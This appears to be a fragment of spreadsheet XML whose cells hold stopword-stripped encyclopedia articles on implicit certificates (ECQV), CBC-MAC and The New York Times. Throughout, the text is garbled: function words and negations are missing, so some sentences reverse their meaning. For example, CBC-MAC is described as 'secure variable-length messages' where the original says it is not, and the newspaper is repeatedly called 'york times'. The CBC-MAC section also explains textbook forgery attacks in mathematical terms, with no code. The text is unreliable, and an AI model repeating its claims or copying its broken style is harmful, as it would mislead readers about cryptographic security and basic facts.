paul garrett, fast modular exponentiation java applet gordon, daniel (1998). survey fast exponentiation methods" (pdf). journal algorithms. elsevier (1): 129–146. doi:10.1006/jagm.1997.0913. issn 0196-6774.</t>
  </si>
  <si>
    <t>Implicit certificate</t>
  </si>
  <si>
    <t>cryptography, implicit certificates variant public certificate. subject's public reconstructed data implicit certificate, said "implicitly" verified. tampering certificate result reconstructed public invalid, sense infeasible find matching private value, would required make tampered certificate. comparison, traditional public-key certificates include copy subject's public key, digital signature made issuing certificate authority (ca). public must explicitly validated, verifying signature using ca's public key. purposes article, certificates called "explicit" certificates. elliptic curve qu-vanstone (ecqv) kind implicit certificate scheme. described document standards efficient cryptography (sec4).this article ecqv concrete example illustrate implicit certificates. comparison ecqv explicit certificates conventional explicit certificates made three parts: subject identification data, public digital signature binds public user's identification data (id). these distinct data elements within certificate, contribute size certificate: example, standard x.509 certificate order size (~8000 bits). ecqv implicit certificate consists identification data, single cryptographic value. this value, elliptic curve point, combines function public data signature. ecqv implicit certificates therefore considerably smaller explicit certificates, useful highly constrained environments radio-frequency identification rfid tags, memory bandwidth available. ecqv certificates useful scheme private public keys form this includes agreement protocols ecdh ecmqv, signing algorithms ecdsa. operation fail certificate altered, reconstructed public invalid. reconstructing public fast single point multiplication operation) compared ecdsa signature verification. comparison id-based cryptography implicit certificates confused identity-based cryptography. id-based schemes, subject's identity used derive public key; 'certificate' such. corresponding private calculated issued subject trusted third party. implicit certificate scheme, subject private revealed certificate-issuing process. trusted issue certificates correctly, hold individual user's private keys. wrongly issued certificates revoked, whereas comparable mechanism misuse private keys identity-based scheme. description ecqv scheme initially scheme parameters must agreed upon. these are: elliptic curve parameters, including generating point {\displaystyle g\,} order {\displaystyle n\,} encoding function encode {\displaystyle {\textrm {encode}}(id,\gamma encodes arguments byte-block, corresponding decode {\displaystyle {\textrm {decode}}_{\gamma }(\cdot extracts {\displaystyle \gamma value encoding. hash function {\displaystyle h_{n}(\cdot accepts byte-block yields hash value integer range {\displaystyle [0,n-1]} certificate authority private {\displaystyle c\,} public {\displaystyle q_{ca}=cg} certificate request protocol here, alice user requests implicit certificate identifying information {\displaystyle id_{a}} alice generates random integer {\displaystyle \alpha alice computes {\displaystyle a=\alpha \,g\,} sends {\displaystyle {\displaystyle id_{a}} selects random integer {\displaystyle k\,} {\displaystyle [1,n-1]\,} computes {\displaystyle kg\,} computes {\displaystyle \gamma =a+kg\,} (this public reconstruction data) computes encode {\displaystyle cert={\textrm {encode}}(\gamma ,{\textrm {id}}_{a})\,} computes {\displaystyle e=h_{n}(cert)} computes {\displaystyle s=ek+c{\pmod {n}}\,} {\displaystyle s\,} private reconstruction data) sends {\displaystyle (s,cert)\,} alice alice computes {\displaystyle e'=h_{n}(cert)} private {\displaystyle a=e'\alpha +s{\pmod {n}}\,} alice computes decode {\displaystyle \gamma '={\textrm {decode}}_{\gamma }(cert)} public {\displaystyle q_{a}=e'\gamma '+q_{ca}\,} alice verifies certificate valid, i.e. {\displaystyle q_{a}=ag} using certificate here, alice wants prove identity bob, trusts alice sends {\displaystyle cert} bob, ciphertext {\displaystyle created using private {\displaystyle ciphertext digital signature, part authenticated exchange protocol. computes decode {\displaystyle \gamma ''={\textrm {decode}}_{\gamma }(cert)} {\displaystyle e''=h_{n}(cert)} computes alice's alleged public {\displaystyle q_{a}'=e''\gamma ''+q_{ca}} validates ciphertext {\displaystyle using {\displaystyle q_{a}'} validation successful, trust {\displaystyle q_{a}'} owned user whose identity information contained {\displaystyle cert} proof equivalence private public keys alice's private {\displaystyle a=e'\alpha +s=e\alpha +ek+c{\pmod {n}}} public reconstruction value {\displaystyle \gamma =a+kg=(\alpha +k)g} alice's public {\displaystyle q_{a}=e\gamma +q_{ca}=e(\alpha +k)g+cg=(e\alpha +ek+c)g} therefore, {\displaystyle q_{a}=ag} completes proof. security security proof ecqv published brown also elliptic curve cryptography references hankerson, vanstone, menezes, (2004). guide elliptic curve cryptography. springer professional computing. york: springer. citeseerx 10.1.1.331.1248. doi:10.1007/b97644. isbn 978-0-387-95273-4. certicom.com, explaining implicit certificates, code cipher vol. leon pintsov scott vanstone, postal revenue collection digital age, financial cryptography 2000, lecture notes computer science 1962, 105–120, springer, february 2000. external links standards efficient cryptography group blackberry crypto supports ecqv blackberry's certicom corp. uses ecqv zigbee smart energy</t>
  </si>
  <si>
    <t>CBC-MAC</t>
  </si>
  <si>
    <t>cryptography, cipher block chaining message authentication code (cbc-mac) technique constructing message authentication code block cipher. message encrypted block cipher algorithm mode create chain blocks block depends proper encryption previous block. this interdependence ensures change plaintext bits cause final encrypted block change cannot predicted counteracted without knowing block cipher. calculate cbc-mac message encrypts mode zero initialization vector keeps last block. following figure sketches computation cbc-mac message comprising blocks {\displaystyle m_{1}\|m_{2}\|\cdots \|m_{x}} using secret block cipher security fixed variable-length messages block cipher used secure (meaning pseudorandom permutation), cbc-mac secure fixed-length messages. however, itself, secure variable-length messages. thus, single must used messages fixed known length. this attacker knows correct message-tag (i.e. cbc-mac) pairs messages {\displaystyle (m,t)} {\displaystyle (m',t')} generate third message {\displaystyle m''} whose cbc-mac also {\displaystyle this simply done xoring first block {\displaystyle concatenating modified {\displaystyle i.e., making {\displaystyle m''=m\|[(m_{1}'\oplus t)\|m_{2}'\|\dots \|m_{x}']} when computing message {\displaystyle m''} follows compute usual manner value chained forwards stage computing {\displaystyle e_{k_{\text{mac}}}(m_{1}'\oplus perform exclusive operation value derived first message. presence message means cancel, leaving contribution blocks plain text first message {\displaystyle e_{k_{\text{mac}}}(m_{1}'\oplus t\oplus t)=e_{k_{\text{mac}}}(m_{1}')} thus {\displaystyle m''} {\displaystyle this problem cannot solved adding message-size block end. there three main ways modifying cbc-mac secure variable length messages: input-length separation; length-prepending; encrypt last block. case, also recommended different mode operation, example, cmac hmac protect integrity variable-length messages. length prepending solution include length message first block; fact cbc-mac proven secure long messages prefixes ever used prepending length special case this. this problematic message length known processing begins. encrypt-last-block encrypt-last-block cbc-mac (ecbc-mac) defined cbc-mac-elb(m, (k1, k2)) e(k2, cbc-mac(k1, m)). compared discussed methods extending cbc-mac variable-length messages, encrypt-last-block advantage needing know length message computation. attack methods many cryptographic schemes, naïve ciphers protocols lead attacks possible, reducing effectiveness cryptographic protection even rendering useless). present attacks possible using cbc-mac incorrectly. using encryption authentication common mistake reuse encryption cbc-mac. although reuse different purposes practice general, particular case mistake leads spectacular attack: suppose alice sent cipher text blocks {\displaystyle c=c_{1}\|c_{2}\|\dots \|c_{n}} during transmission process, tamper {\displaystyle c_{1},\dots ,c_{n-1}} cipher-text blocks adjust bits therein chooses, provided final block, {\displaystyle c_{n}} remains same. assume, purposes example without loss generality, initialization vector used encryption process vector zeroes. when receives message, first decrypt message reversing encryption process alice applied, using cipher text blocks {\displaystyle c=c_{1}\|c_{2}\|\cdots \|c_{n}} tampered message, delivered replacement alice's original, {\displaystyle c'=c_{1}'\|\dots \|c_{n-1}'\|c_{n}} first decrypts message received using shared secret obtain corresponding plain text. note plain text produced different alice originally sent, modified last cipher text block. particular, final plain text, {\displaystyle p_{n}'} differs original, {\displaystyle p_{n}} alice sent; although {\displaystyle c_{n}} same, {\displaystyle c_{n-1}'\not =c_{n-1}} different plain text {\displaystyle p_{n}'} produced chaining previous cipher text block exclusive-or decryption {\displaystyle c_{n}} {\displaystyle p_{n}'=c_{n-1}'\oplus e_{k}^{-1}(c_{n})} follows compute authentication using cbc-mac values plain text decoded. message, {\displaystyle given {\displaystyle t'=e_{k}(p_{n}'\oplus e_{k}(p_{n-1}'\oplus e_{k}(\dots \oplus e_{k}(p_{1}'))))} notice expression equal {\displaystyle t'=e_{k}(p_{n}'\oplus c_{n-1}')} exactly {\displaystyle c_{n}} {\displaystyle t'=e_{k}(c_{n-1}'\oplus e_{k}^{-1}(c_{n})\oplus c_{n-1}')=e_{k}(e_{k}^{-1}(c_{n}))=c_{n}} follows {\displaystyle t'=c_{n}=t} therefore, able modify cipher text transit (without necessarily knowing plain text corresponds entirely different message, {\displaystyle produced, message matched original, unaware contents modified transit. definition, message authentication code broken find different message sequence plain-text pairs {\displaystyle produces previous message, {\displaystyle p\not =p'} follows message authentication protocol, usage scenario, broken, deceived believing alice sent message produce. instead, different keys encryption authentication stages, {\displaystyle k_{1}} {\displaystyle k_{2}} respectively, attack foiled. decryption modified cipher-text blocks {\displaystyle c_{i}'} obtains plain text string {\displaystyle p_{i}'} however, mac's usage different {\displaystyle k_{2}} cannot "undo" decryption process forward step computation message authentication code produce tag; modified {\displaystyle p_{i}'} encrypted {\displaystyle k_{2}} cbc-mac process value {\displaystyle \mathrm {mac} _{i}\not =c_{i}'} this example also shows cbc-mac cannot used collision-resistant one-way function: given trivial create different message "hashes" tag. allowing initialization vector vary value when encrypting data using block cipher cipher block chaining another) mode, common introduce initialization vector first stage encryption process. typically required vector chosen randomly nonce) repeated given secret block cipher operates. this provides semantic security, means ensuring plain text encrypted cipher text, allowing attacker infer relationship exists. when computing message authentication code, cbc-mac, initialization vector possible attack vector. operation ciphertext block chaining cipher, first block plain text mixed initialization vector using exclusive {\displaystyle p_{1}\oplus result operation input block cipher encryption. however, performing encryption decryption, required send initialization vector plain text typically block immediately preceding first block cipher text first block plain text decrypted recovered successfully. computing mac, also need transmit initialization vector party plain text verify message matches value computed. allow initialization vector selected arbitrarily, follows first block plain text potentially modified (transmitting different message) producing message tag. consider message {\displaystyle m_{1}=p_{1}|p_{2}|\dots particular, computing message cbc-mac, suppose choose initialization vector {\displaystyle iv_{1}} computation begins {\displaystyle e_{k}(iv_{1}\oplus p_{1})} this produces (message, tag) pair {\displaystyle (m_{1},t_{1})} produce message {\displaystyle m_{2}=p_{1}'|p_{2}|\dots modified {\displaystyle p_{1}'} flip corresponding initialization vector produce initialization vector {\displaystyle iv_{1}'} follows compute message, begin computation {\displaystyle e_{k}(p_{1}'\oplus iv_{1}')} bits plain text initialization vector flipped places, modification cancelled first stage, meaning input block cipher identical {\displaystyle m_{1}} changes made plain text, derived despite different message transmitted. freedom select initialization vector removed implementations cbc-mac particular initialization vector (often vector zeroes, theory, could anything provided implementations agree), attack cannot proceed. attacker able used verification, perform arbitrary modification first data block without invalidating mac. using predictable initialization vector sometimes used counter prevent message replay attacks. however, attacker predict used verification, replay previously observed message modifying first data block compensate change used verification. example, attacker observed message {\displaystyle m_{1}=p_{1}|p_{2}|\dots {\displaystyle iv_{1}} knows {\displaystyle iv_{2}} produce {\displaystyle m_{1}'=(p_{1}\oplus iv_{1}\oplus iv_{2})|p_{2}|\dots pass verification {\displaystyle iv_{2}} simplest countermeasure encrypt using (i.e., prepending data). alternatively mode used, mode encrypted xored data. another solution case protection message replay attacks required) always zero vector note formula {\displaystyle m_{1}'} becomes {\displaystyle m_{1}'=(p_{1}\oplus 0\oplus 0)|p_{2}|\dots =p_{1}|p_{2}|\dots =m_{1}} since {\displaystyle m_{1}} {\displaystyle m_{1}'} message, definition tag. this forgery, rather intended cbc-mac. standards define algorithm fips computer data authentication (now obsolete) u.s. government standard specified cbc-mac algorithm using block cipher. cbc-mac algorithm equivalent iso/iec 9797-1 algorithm also cmac block-cipher–based algorithm secure messages different lengths (recommended nist). omac pmac other methods turn block ciphers message authentication codes (macs). one-way compression function hash functions made block ciphers. note, significant differences function uses security macs (such cbc-mac) hashes. references</t>
  </si>
  <si>
    <t>The New York Times</t>
  </si>
  <si>
    <t>york times (known informally nyt) american daily newspaper based york city worldwide readership. founded 1851 henry jarvis raymond george jones, initially published raymond, jones company. times pulitzer prizes, newspaper, long regarded national "newspaper record". ranked 18th world circulation u.s.the paper owned york times company, publicly traded. governed sulzberger family since 1896, dual-class share structure shares became publicly traded. sulzberger father, arthur ochs sulzberger jr.—the paper's publisher company's chairman, respectively—are fifth fourth generations family head paper.since mid-1970s, york times expanded layout organization, adding special weekly sections various topics supplementing regular news, editorials, sports, features. since 2008, times organized following sections: news, editorials/opinions-columns/op-ed, york (metropolitan), business, sports, arts, science, styles, home, travel, features. sundays, times supplemented sunday review (formerly week review), york times book review, york times magazine, york times style magazine.the editorial pages york times typically liberal position. history origins york times founded new-york daily times september 1851. founded journalist politician henry jarvis raymond former banker george jones, times initially published raymond, jones company. early investors company included edwin morgan, christopher morgan, edward wesley. sold penny (equivalent $0.33 2021), inaugural edition attempted address various speculations purpose positions preceded release: shall conservative, cases think conservatism essential public good;—and shall radical everything seem require radical treatment radical reform. believe everything society either exactly right exactly wrong;—what good desire preserve improve;—what evil, exterminate, reform. 1852, newspaper started western division, times california, arrived whenever mail boat york docked california. effort failed local california newspapers came prominence.on september 1857, newspaper officially shortened name new-york times. hyphen city name dropped december 1896. april 1861, york times began publishing sunday edition offer daily coverage civil war. main office york times attacked york city draft riots. riots, sparked institution draft union army, began july 1863. "newspaper row", across city hall, co-founder henry raymond stopped rioters gatling guns, early machine guns, wielded himself. diverted, instead attacking headquarters abolitionist publisher horace greeley's york tribune forced flee brooklyn city police, crossed east river help manhattan authorities.in 1869, henry raymond died, george jones took publisher. newspaper's influence grew 1870 1871, published series exposés william tweed, leader city's democratic party popularly known "tammany hall" (from early-19th-century meeting headquarters) tweed ring's domination york's city hall. tweed offered york times five million dollars (equivalent million dollars 2021) publish story.in 1880s, york times gradually transitioned supporting republican party candidates editorials becoming politically independent analytical. 1884, paper supported democrat grover cleveland (former mayor buffalo governor york) first presidential campaign. while move cost york times portion readership among republican readers (revenue declined $188,000 $56,000 1883 1884), paper eventually regained lost ground within years. ochs after george jones died 1891, charles ransom miller york times editors raised million (equivalent million 2021) times, printing york times publishing company. newspaper found financial crisis panic 1893, 1896, newspaper circulation less 9,000 losing $1,000 day. that year, adolph ochs, publisher chattanooga times, gained controlling interest company $75,000.shortly assuming control paper, ochs coined paper's slogan, "all news that's print". slogan appeared paper since september 1896, printed upper left hand corner front page since early 1897. slogan competing papers, joseph pulitzer's york world william randolph hearst's york journal, known lurid, sensationalist often inaccurate reporting facts opinions, described century "yellow journalism". under ochs' guidance, aided carr anda, york times achieved international scope, circulation, reputation; sunday circulation went 9,000 1896 780,000 1934. anda also created newspaper's photo library, colloquially referred "the morgue." 1904, russo-japanese war, york times, along times, received first on-the-spot wireless telegraph transmission naval battle: report destruction russian navy's baltic fleet, battle port arthur, press-boat haimun. 1910, first delivery york times philadelphia began. 1919, york times' first trans-atlantic delivery london occurred dirigible balloon. 1920, 1920 republican national convention, a.m. airplane edition" sent chicago plane, could hands convention delegates evening.in 1920, walter lippmann charles merz published test news, york times coverage russian revolution. they concluded news stories based facts, "were determined hopes made news organisations." newspaper referred events taken place, atrocities exist, reported fewer times bolshevik regime verge collapse. post-war expansion ochs died 1935 succeeded publisher son-in-law, arthur hays sulzberger. under leadership, son-in-law (and successor), orvil dryfoos, paper extended breadth reach, beginning 1940s. crossword began appearing regularly 1942, fashion section first appeared 1946. york times began international edition 1946. (the international edition stopped publishing 1967, york times joined owners york herald tribune washington post publish international herald tribune paris.) after years publisher, dryfoos died 1963 succeeded brother-in-law, arthur ochs "punch" sulzberger, times 1992 continued expansion paper. york times sullivan (1964) paper's involvement 1964 libel case helped bring united states supreme court decisions supporting freedom press, york times sullivan. united states supreme court established "actual malice" standard press reports public officials public figures considered defamatory libelous. malice standard requires plaintiff defamation libel case prove publisher statement knew statement false acted reckless disregard truth falsity. because high burden proof plaintiff, difficulty proving malicious intent, cases public figures rarely succeed. pentagon papers (1971) 1971, pentagon papers, secret united states department defense history united states' political military involvement vietnam 1945 1967, given ("leaked") neil sheehan york times former state department official daniel ellsberg, friend anthony russo assisting copying them. york times began publishing excerpts series articles june controversy lawsuits followed. papers revealed, among things, government deliberately expanded role conducting airstrikes laos, raids along coast north vietnam, offensive actions taken u.s. marines well public told actions, president lyndon johnson promising expand war. document increased credibility u.s. government, hurt efforts nixon administration fight ongoing war.when york times began publishing series, president richard nixon became incensed. words national security advisor henry kissinger included "people gotta torch sort thing" "let's son-of-a-bitch jail." after failing york times stop publishing, attorney general john mitchell president nixon obtained federal court injunction york times cease publication excerpts. newspaper appealed case began working court system. june 1971, washington post began publishing series. bagdikian, post editor, obtained portions papers ellsberg. that post received call william rehnquist, assistant u.s. attorney general office legal counsel, asking stop publishing. when post refused, u.s. justice department sought another injunction. u.s. district court judge refused, government appealed. june 1971, u.s. supreme court agreed take cases, merging york times united states. june 1971, supreme court held decision injunctions unconstitutional prior restraints government burden proof required. justices wrote nine separate opinions, disagreeing significant substantive issues. while generally seen victory claim first amendment enshrines absolute right free speech, many felt lukewarm victory, offering little protection future publishers claims national security stake. late 1970s–1990s 1970s, paper introduced number lifestyle sections, including weekend home, attracting advertisers readers. many criticized move betraying paper's mission. september 1976, paper switched eight-column format six-column format. overall page width stayed same, column becoming wider. september 1987, times printed heaviest-ever newspaper, pounds (5.4 1,612 pages.in 1992, "punch" sulzberger stepped publisher; son, arthur ochs sulzberger jr., succeeded him, first publisher chairman board 1997. times last newspapers adopt color photography, first color photograph front page appearing october 1997. digital early digital content york times switched digital production process sometime 1980, began preserving resulting digital text year. 1983, times sold electronic rights articles lexisnexis. online distribution news increased 1990s, times decided renew deal 1994 newspaper regained electronic rights articles. january 1996, nytimes.com began publishing. 2000s august 2007, paper reduced physical size print edition, cutting page width 13.5 inches inches cm). this followed similar moves roster newspapers previous years, including today, wall street journal, washington post. move resulted reduction news space, dwindling circulation significant advertising revenue losses) also saved million year.in september 2008, york times announced would combining certain sections effective october 2008, editions printed york metropolitan area. changes folded metro section main international national news section combined sports business (except saturday monday, sports continues printed standalone section). this change also included metro section called york outside tri-state area. presses used york times allow four sections printed simultaneously; paper includes four sections days except saturday, sections required printed separately early press collated together. changes allowed york times print four sections monday wednesday, addition saturday. york times' announcement stated number news pages employee positions would remain unchanged, paper realizing cost savings cutting overtime expenses.because declining sales largely attributed rise online news sources, favored especially younger readers, decline advertising revenue, newspaper going downsizing several years, offering buyouts workers cutting expenses, common general trend among print news media. following industry trends, weekday circulation fallen 2009 fewer million.in 2009, newspaper began production local inserts regions outside york area. beginning october 2009, two-page "bay area" insert added copies northern california edition fridays sundays. newspaper commenced production similar friday sunday insert chicago edition november 2009. inserts consist local news, policy, sports, culture pieces, usually supported local advertisements. 2010s december 2012, times published "snow fall", six-part article 2012 tunnel creek avalanche integrated videos, photos, interactive graphics hailed watershed moment online journalism.in 2013, "how y’all, youse guys talk," interactive quiz created intern josh katz, based harvard dialect survey, collected responses 50,000 people answering questions said different things across united states became times popular piece content year.in 2016, reporters newspaper reportedly target cybersecurity breaches. federal bureau investigation reportedly investigating attacks. cybersecurity breaches described possibly related cyberattacks targeted institutions, democratic national committee.during 2016 presidential election, times played important role elevating hillary clinton emails controversy important subject media coverage election clinton would lose narrowly donald trump. controversy received media coverage topic presidential campaign. clinton observers argue coverage emails controversy contributed loss election. according columbia journalism review analysis, days, york times many cover stories hillary clinton's emails policy issues combined days leading election (and include three additional articles october november articles emails taken john podesta)."in october 2018, times published 14,218-word investigation donald trump's "self-made" fortune avoidance, 18-month project based examination 100,000 pages documents. extensive article eight-page feature print edition also adapted shortened 2,500 word listicle featuring takeaways. after midweek front-page story, times also republished piece 12-page "special report" section sunday paper. during lengthy investigation, showtime cameras followed times' three investigative reporters half-hour documentary called family business: trump taxes, aired following sunday. report pulitzer prize explanatory reporting.in 2019, york times announced would present television news program based news individual reporters stationed around world would premiere hulu. 2020s august 2021, paper announced effort would make newsletters available subscribers, even though popular ones would remain free. part response competition substack.in january 2022, york times company announced would acquire athletic, subscription-based sports news website. $550 million deal expected close first quarter 2022, athletic's co-founders, alex mather adam hansmann, would stay publication, would continue separately times. recode/vox reported acquisition part effort paper younger, diverse readership, offerings like games, cooking, audio. month, paper announced acquiring wordle, relatively game became popular rather quickly would remain free "initially."in april 2022, york times published three-part 20,000-word investigative series news host tucker carlson called "american nationalist". investigative series documents carlson's rise prominence rhetoric immigration, race relations covid-19 pandemic. carlson responded saying read "american nationalist" plan also denied allegations times obsessing ratings, saying "i've never read ratings single life. even know how. anyone fox." "most positions i've taken past five years neocons, ukraine] unpopular audience first." headquarters building newspaper's first building located nassau street york city. 1854, moved nassau street, 1858 park row, making first newspaper york city housed building built specifically use.the newspaper moved headquarters times tower, located 1475 broadway 1904, area called longacre square, later renamed times square newspaper's honor. building known times square site year's tradition lowering lighted ball, begun paper. building also known electronic news ticker popularly known "the zipper" headlines crawl around outside building. still use, operated jones company since 1995. after nine years times square tower, newspaper annex built west 43rd street. after several expansions, 43rd street building became newspaper's main headquarters 1960 times tower broadway sold following year. served newspaper's main printing plant 1997, newspaper opened state-of-the-art printing plant college point section queens.a decade later, york times moved newsroom businesses headquarters west 43rd street tower eighth avenue west 40th 41st streets, manhattan directly across eighth avenue port authority terminal. headquarters newspaper, known officially york times building unofficially called "times tower" many yorkers, skyscraper designed renzo piano. gender discrimination employment discriminatory practices used paper long restricted women appointments editorial positions. newspaper's first general female reporter jane grant, described experience afterward: beginning charged reveal fact female hired". other reporters nicknamed fluff subjected considerable hazing. because gender, promotion question, according then-managing editor. remained staff fifteen years, interrupted world i.in 1935, anne mccormick wrote arthur hays sulzberger: hope expect revert 'woman's-point-of-view' stuff." later, interviewed major political leaders appears easier access colleagues. even witnesses actions unable explain gained interviews did. clifton daniel said, "[after world ii,] sure adenauer called invited lunch. never grovel appointment."covering world leaders' speeches world national press club limited club rule. when women eventually allowed hear speeches directly, still allowed speakers questions. allowed ask, even though women pulitzer prizes prior work. times reporter maggie hunter refused return club covering speech assignment. robertson's article union stock yards, chicago, read aloud anonymous professor, said: "'it come surprise you, perhaps, reporter girl,' began... [g]asps; amazement ranks. 'she used senses, eyes, convey smell feel stockyards. chose difficult subject, offensive subject. imagery strong enough revolt you.'" york times hired kathleen mclaughlin years chicago tribune, "[s]he series maids, going apply housekeeping jobs." slogan york times slogan. since 1896, newspaper's slogan "all news that's print." 1896, adolph ochs held competition attempt find replacement slogan, offering $100 prize best one. though later announced original would changed, prize would still awarded. entries included "news, nausea"; word: adequate"; "news without noise"; "out heralds herald, informs world, extinguishes sun"; "the public press public trust"; winner competition, "all world's news, school scandal." 1960, wright patman asked investigate whether york times's slogan misleading false advertising. within days, responded not.again 1996, competition held find slogan, time nytimes.com. over 8,000 entries submitted, "all news that's print" found best. organization meredith kopit levien president chief executive officer since september 2020. news staff addition york city headquarters, paper newsrooms london hong kong. paris newsroom, headquarters paper's international edition, closed 2016, although city remains home news bureau advertising office. paper also editing wire service center gainesville, florida.as 2013, newspaper news bureaus york region, elsewhere united states, countries.in 2009, russ stanton, editor angeles times, competitor, stated newsroom york times twice size angeles times, newsroom time.to facilitate reporting hasten otherwise lengthy process reviewing many documents preparation publication, interactive news team adapted optical character recognition technology proprietary tool known document helper. enables team accelerate processing documents need reviewed. during march 2019, documented tool enabled process documents less minutes preparation reporters review contents.the newspaper's editorial staff, including 3,000 reporters media staff, unionized newsguild. 2021, times's digital technology staff formed union newsguild, company declined voluntarily recognize. ochs-sulzberger family 1896, adolph ochs bought york times, money-losing newspaper, formed york times company. ochs-sulzberger family, united states' newspaper dynasties, owned york times ever since. publisher went public january 1969, trading share american stock exchange. after this, family continued exert control ownership vast majority class voting shares. class shareholders permitted restrictive voting rights, class shareholders allowed open voting rights. ochs-sulzberger family trust controls roughly percent company's class shares. alteration dual-class structure must ratified eight directors board ochs-sulzberger family trust. trust board members daniel cohen, james cohen, lynn dolnick, susan dryfoos, michael golden, eric lax, arthur sulzberger jr., cathy sulzberger.turner catledge, editor york times 1952 1968, wanted hide ownership influence. arthur sulzberger routinely wrote memos editor, containing suggestions, instructions, complaints, orders. when catledge would receive memos, would erase publisher's identity passing subordinates. catledge thought removed publisher's name memos, would protect reporters feeling pressured owner. public editors position public editor established 2003 "investigate matters journalistic integrity"; public editor serve two-year term. post "was established receive reader complaints question times journalists make decisions." impetus creation public editor position jayson blair affair. public editors were: daniel okrent (2003–2005), byron calame (2005–2007), clark hoyt (2007–2010) (served extra year), arthur brisbane (2010–2012), margaret sullivan (2012–2016) (served four-year term), elizabeth spayd (2016–2017). 2017, times eliminated position public editor. content editorial stance editorial pages york times typically liberal position. mid-2004, newspaper's public editor (ombudsman), daniel okrent, wrote "the op-ed page editors evenhanded representing range views essays outsiders publish need awfully heavy counterweight balance page also bears work seven opinionated columnists, could classified conservative (and, even then, conservative subspecies supports legalization unions and, case william safire, opposes central provisions patriot act)."the york times endorsed republican party member president since dwight eisenhower 1956; since 1960, endorsed democratic party nominee every presidential election (see york times presidential endorsements). york times endorse incumbent moderate republican mayors york city rudy giuliani 1997, michael bloomberg 2005 2009. times also endorsed republican york state governor george pataki re-election 2002. style unlike u.s. daily newspapers, times relies in-house stylebook rather associated press stylebook. when referring people, york times generally uses honorifics rather unadorned last names (except sports pages, culture coverage, book review magazine).the york times printed display advertisement first page january 2009, breaking tradition paper. advertisement, cbs, color entire width page. newspaper promised would place first-page advertisements lower half page.in august 2014, times decided word "torture" describe incidents interrogators "inflicted pain prisoner effort information." this shift paper's previous practice describing practices "harsh" "brutal" interrogations.the paper maintains strict profanity policy. 2007 review concert punk band fucked example, completely avoided mention group's name. times occasion published unfiltered video content includes profanity slurs determined video news value. during 2016 u.s. presidential election campaign, times print words "fuck" "pussy," among others, reporting vulgar statements made donald trump 2005 recording. then-times politics editor carolyn ryan said: "it's rare thing language stories, even quotes, discussed length." ryan said paper ultimately decided publish news value "[t]o leave simply describe seemed awkward less forthright especially given would running video showed readers exactly said." products print newspaper absence major headline, day's important story generally appears top-right column, main page. typefaces used headlines custom variations cheltenham. running text point imperial.the newspaper organized three sections, including magazine: news: includes international, national, washington, business, technology, science, health, sports, metro section, education, weather, obituaries. opinion: includes editorials, op-eds letters editor. features: includes arts, movies, theater, travel, guide, food, home garden, fashion style, crossword, york times book review, york times style magazine, york times magazine, sunday review.some sections, metro, found editions paper distributed york–new jersey–connecticut tri-state area national washington, d.c., editions. aside weekly roundup reprints editorial cartoons newspapers, york times staff editorial cartoonist, feature comics page sunday comics section.from 1851 2017, york times published around 60,000 print issues containing million pages million articles. like american newspapers, york times experienced decline circulation. printed weekday circulation dropped percent 540,000 copies 2005 2017. international edition york times international edition print version paper tailored readers outside united states. formerly joint venture washington post named international herald tribune, york times took full ownership paper 2002 gradually integrated closely domestic operations. website york times began publishing daily world wide january 1996, "offering readers around world immediate access daily newspaper's contents." website million pageviews million unique visitors march 2005. march 2020, risen billion pageviews million unique visitors.as 2009, nytimes.com produced popular newspaper blogs.as august 2020, company million paid subscribers, million subscribed digital content. period april–june 2020, added 669,000 digital subscribers. food section food section supplemented properties home cooks out-of-home dining. york times cooking (cooking.nytimes.com; also available app) provides access 17,000 recipes file november 2016, availability saving recipes sites around web. newspaper's restaurant search (nytimes.com/reviews/dining) allows online readers search area restaurants cuisine, neighborhood, price, reviewer rating. york times also published several cookbooks, including essential york times cookbook: classic recipes century, published late 2010. timesselect september 2005, paper decided begin subscription-based service daily columns program known timesselect, encompassed many previously free columns. until discontinued years later, timesselect cost $7.95 month $49.95 year, though free print copy subscribers university students faculty. avoid charge, bloggers often reposted timesselect material, least site compiled links reprinted material.on september 2007, york times announced would stop charging access parts site, effective midnight following day, reflecting growing view industry subscription fees cannot outweigh potential revenue increased traffic free site.times columnists including nicholas kristof thomas friedman criticized timesselect, friedman going hate pains enormously lot, people, especially people reading overseas, like india feel totally audience." paywall digital subscriptions 2007, addition opening almost entire site readers, york times news archives 1987 present made available charge non-subscribers, well 1851 1922, public domain.falling print advertising revenue projections continued decline resulted "metered paywall" instituted march 2011, limiting non-subscribers monthly allotment free on-line articles month. this measure regarded modestly successful garnering several hundred thousand subscriptions $100 million revenue march 2012.beginning april 2012, number free-access articles halved articles month. reader wanted access would digital subscription. this plan allowed free access occasional readers. digital subscription rates four weeks ranged depending package selected, periodic subscriber promotions offering four-week all-digital access 99¢. subscribers paper's print edition full access without additional fee. some content, front page section fronts remained free, well news page mobile apps. january 2013, york times' public editor margaret sullivan announced first time many decades, paper generated revenue subscriptions advertising.in december 2017, number free articles month reduced first change metered paywall since april 2012. executive york times company stated decision motivated all-time high" demand journalism. digital subscription york times cost month 2017. december 2017, york times total million paid subscriptions print digital versions, million monthly readers, double audience years previously. february 2018, york times company reported increased revenue digital-only subscriptions, adding 157,000 subscribers total million digital-only subscribers. digital advertising also growth period. time, advertising print version journal fell. mobile presence apps 2008, york times made available iphone ipod touch; well publishing ipad 2010. allowed users download articles mobile device enabling read paper even unable receive signal. october 2010, york times ipad ad-supported available free without paid subscription, translated subscription-based model 2011.in 2010, york times editors collaborated students faculty york university's studio journalism masters program launch produce "the local east village", hyperlocal blog designed offer news "by, residents east village". that year, recaptcha helped digitize editions york times.in 2010, newspaper also launched android smartphones, followed later windows phones.moreover, times first newspaper offer video game part editorial content, food import folly persuasive games. times reader times reader digital version york times, created collaboration newspaper microsoft. times reader takes principles print journalism applies technique online reporting, using series technologies developed microsoft windows presentation foundation team. announced seattle april 2006, arthur ochs sulzberger jr., bill gates, bodkin.in 2009, times reader rewritten adobe air. december 2013, newspaper announced times reader would discontinued january 2014, urging readers instead begin using subscription-only today's paper app. podcasts york times began producing podcasts 2006. among early podcasts inside times inside york times book review. several times' podcasts cancelled 2012.the times returned launching podcasts 2016, including modern love wbur. january 2017, york times launched news podcast, daily. october 2018, debuted argument opinion columnists ross douthat, michelle goldberg david leonhardt. weekly discussion single issue explained left, center, right political spectrum. non-english versions chinese-language june 2012, york times introduced first official foreign-language variant, cn.nytimes.com, chinese-language news site viewable traditional simplified chinese characters. project craig smith business side philip editorial side, content created staff based shanghai, beijing, hong kong, though server placed outside china avoid censorship issues.the site's initial success interrupted october year following publication investigative article david barboza finances chinese premier jiabao's family. retaliation article, chinese government blocked access nytimes.com cn.nytimes.com inside people's republic china (prc). despite chinese government interference, chinese-language operations continued 